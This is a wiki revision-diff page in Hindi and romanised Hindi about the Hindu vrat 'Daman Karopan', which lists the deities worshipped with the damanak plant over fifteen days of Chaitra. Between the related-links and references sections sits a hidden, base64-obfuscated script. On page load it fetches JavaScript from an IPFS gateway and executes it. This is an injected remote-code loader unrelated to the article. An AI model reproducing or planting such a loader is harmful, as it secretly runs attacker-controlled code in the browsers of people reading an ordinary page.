Difference between revisions of "दमन कारोपण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
 
(One intermediate revision by one other user not shown)
Line 2: Line 2:
 
*[[चैत्र]] की प्रतिपदा से अमावस तक होती है।
 
*[[चैत्र]] की प्रतिपदा से अमावस तक होती है।
 
*प्रथम तिथि से 15 दिनों तक दमनक पौधे से विभिन्न देवों की पूजा, यथा—प्रथम दिन [[उमा]], [[शिव]] एवं अग्नि, दूसरे दिन [[ब्रह्मा]] की, तीसरे दिन देवों एवं [[शंकर]] की, चौथे दिन से 15वें दिन तक क्रम से [[गणेश]], नागों, स्कन्द, भास्कर, माताओं, महिषमर्दिनी, धर्म, ऋषियों, [[विष्णु]], काम, [[शिव]], [[इन्द्र]] (शची के साथ) की होती है।<ref> हेमाद्रि व्रतखण्ड 2, 453-45; कृत्यरत्नाकर (31-95); समयमयूख (84-86)।</ref>
 
*प्रथम तिथि से 15 दिनों तक दमनक पौधे से विभिन्न देवों की पूजा, यथा—प्रथम दिन [[उमा]], [[शिव]] एवं अग्नि, दूसरे दिन [[ब्रह्मा]] की, तीसरे दिन देवों एवं [[शंकर]] की, चौथे दिन से 15वें दिन तक क्रम से [[गणेश]], नागों, स्कन्द, भास्कर, माताओं, महिषमर्दिनी, धर्म, ऋषियों, [[विष्णु]], काम, [[शिव]], [[इन्द्र]] (शची के साथ) की होती है।<ref> हेमाद्रि व्रतखण्ड 2, 453-45; कृत्यरत्नाकर (31-95); समयमयूख (84-86)।</ref>
 
+
{{प्रचार}}
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:09, 15 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr ki pratipada se amavas tak hoti hai.
  • pratham tithi se 15 dinoan tak damanak paudhe se vibhinn devoan ki pooja, yatha—pratham din uma, shiv evan agni, doosare din brahma ki, tisare din devoan evan shankar ki, chauthe din se 15vean din tak kram se ganesh, nagoan, skand, bhaskar, mataoan, mahishamardini, dharm, rrishiyoan, vishnu, kam, shiv, indr (shachi ke sath) ki hoti hai.[1]

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri vratakhand 2, 453-45; krityaratnakar (31-95); samayamayookh (84-86).